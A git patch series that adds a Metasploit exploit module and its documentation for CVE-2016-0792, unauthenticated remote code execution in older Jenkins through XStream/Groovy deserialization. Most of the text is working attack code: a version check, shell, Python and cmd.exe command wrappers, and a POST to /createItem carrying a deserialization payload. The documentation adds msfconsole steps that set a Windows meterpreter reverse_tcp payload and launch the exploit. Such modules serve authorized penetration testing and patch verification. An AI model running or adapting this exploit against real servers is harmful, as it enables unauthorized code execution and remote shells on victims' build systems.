From 371f3c333a674bd6247fb4e906397600a978aa79 Mon Sep 17 00:00:00 2001 From: attackdebris Date: Tue, 7 Nov 2017 09:46:42 -0500 Subject: [PATCH 1/5] This commit adds the jenkins_xstream_deserialize module --- .../multi/http/jenkins_xstream_deserialize.rb | 140 ++++++++++++++++++ 1 file changed, 140 insertions(+) create mode 100644 modules/exploits/multi/http/jenkins_xstream_deserialize.rb diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb new file mode 100644 index 0000000000..7612756416 --- /dev/null +++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb @@ -0,0 +1,140 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Jenkins XStream Groovy classpath Deserialization Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions + older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, + which allows remote arbitrary code execution. The issue affects default installations. Authentication + is not required to exploit the vulnerability. + }, + 'Author' => + [ + 'Arshan Dabirsiaghi', # Vulnerability discovery + 'Matt Byrne ' # Metasploit module + ], + 'DisclosureDate' => 'Feb 24 2016', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2016-0792'], + ['URL', 'https://https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'], + ['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413'] + ], + 'Platform' => %w{ win linux unix }, + 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], + 'Targets' => [ + ['Unix (In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + ], + ['Python (In-Memory)', + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON + ], + ['Linux (Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64] + ], + ['Windows (Dropper)', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']), + Opt::RPORT('8080') + ]) + deregister_options('URIPATH') + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path) + }) + + unless res + fail_with(Failure::Unknown, 'The connection timed out.') + end + + http_headers = res.headers + + if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f < 1.650 + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + def exploit + case target.name + when /Unix/, /Python/ + execute_command(payload.encoded) + else + execute_cmdstager + end + end + + # Exploit methods + + def execute_command(cmd, opts = {}) + cmd = case target.name + when /Unix/, /Linux/ + %W{/bin/sh -c #{cmd}} + when /Python/ + %W{python -c #{cmd}} + when /Windows/ + %W{cmd.exe /c #{cmd}} + end + + # Encode each command argument with XML entities + cmd.map! { |arg| arg.encode(xml: :text) } + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/createItem?name=random'), + 'ctype' => 'application/xml', + 'data' => xstream_payload(cmd) + ) + end + + def xstream_payload(cmd) + < + + + + + hashCode + + + + + #{cmd.join('')} + + + start + + + + + 1 + + +EOF + end +end From d770406049928db406f5b78b818adebde24fe33c Mon Sep 17 00:00:00 2001 From: attackdebris Date: Tue, 7 Nov 2017 10:58:28 -0500 Subject: [PATCH 2/5] Add docs --- .../multi/http/jenkins_xstream_deserialize.md | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md diff --git a/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md b/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md new file mode 100644 index 0000000000..0ea20e793f --- /dev/null +++ b/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md @@ -0,0 +1,62 @@ +Jenkins XStream Groovy classpath Deserialization Vulnerability (CVE-2016-0792) + +This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability. + +## Vulnerable Application + +Jenkins versions < 1.650 and Jenkins LTS versions < 1.642.2 + +Download Jenkins (Windows) < version 1.650 from here: +http://mirrors.jenkins-ci.org/windows/ + +Windows Installation: Double click .msi + +Download Jenkins LTS (Debian) < version 1.642.2 from here: +https://pkg.jenkins.io/debian-stable/ + +Download Jenkins (Debian) < version 1.650 from here: +https://pkg.jenkins.io/debian/ + +Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb` + +## Options + +**TARGETURI** + +The base path to Jenkins application `/` by default + +**VHOST** + +The HTTP server virtual host. You may need to configure this as well, even though it is set as optional. + +**The Check Command** + +The `jenkins_xstream_deserialize` module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following: + +Note: The check only uses `appears to be vulnerable` because it is not possible to differentiate from HTTP headers which Jenkins line (Weekly or LTS) is running. + +``` +set RHOST [IP] + +set TARGETURI [path to Jenkins] +``` + +``` +msf exploit(jenkins_xstream_deserialize) > check + +[*] 192.168.1.64:8080 The target appears to be vulnerable.. +``` + +**Exploiting the Host** + +After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS. + +``` +msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.37 +RHOST => 192.168.1.37 +msf exploit(jenkins_xstream_deserialize) > set target 3 +target => 3 +msf exploit(jenkins_xstream_deserialize) > set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +msf exploit(jenkins_xstream_deserialize) > exploit +``` From 7173e7f4b409402f3b65c3fbd86d88f3c6a1ce02 Mon Sep 17 00:00:00 2001 From: attackdebris Date: Tue, 7 Nov 2017 11:05:14 -0500 Subject: [PATCH 3/5] Add CVE to module description --- modules/exploits/multi/http/jenkins_xstream_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb index 7612756416..37327d7f98 100644 --- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb +++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Jenkins XStream Groovy classpath Deserialization Vulnerability', 'Description' => %q{ - This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions + This module exploits CVE-2016-0792 a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability. From a04bc0a25b4c5247c1b5cc510ac44f006690adea Mon Sep 17 00:00:00 2001 From: attackdebris Date: Wed, 8 Nov 2017 16:30:59 -0500 Subject: [PATCH 4/5] Add get_vars, remove a https instance --- .../multi/http/jenkins_xstream_deserialize.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb index 37327d7f98..99d37cc995 100644 --- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb +++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2016-0792'], - ['URL', 'https://https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'], + ['URL', 'https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream'], ['URL', 'https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413'] ], 'Platform' => %w{ win linux unix }, @@ -105,10 +105,13 @@ class MetasploitModule < Msf::Exploit::Remote cmd.map! { |arg| arg.encode(xml: :text) } res = send_request_cgi( - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, '/createItem?name=random'), - 'ctype' => 'application/xml', - 'data' => xstream_payload(cmd) + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/createItem'), + 'vars_get' => { + 'name' => 'random' + }, + 'ctype' => 'application/xml', + 'data' => xstream_payload(cmd) ) end From 500bde115006388dfa318ecef06563052db4adbc Mon Sep 17 00:00:00 2001 From: attackdebris Date: Thu, 9 Nov 2017 04:16:34 -0500 Subject: [PATCH 5/5] get_vars tweak --- modules/exploits/multi/http/jenkins_xstream_deserialize.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb index 99d37cc995..f68ad258ed 100644 --- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb +++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb @@ -107,9 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/createItem'), - 'vars_get' => { - 'name' => 'random' - }, + 'vars_get' => { 'name' => 'random' }, 'ctype' => 'application/xml', 'data' => xstream_payload(cmd) )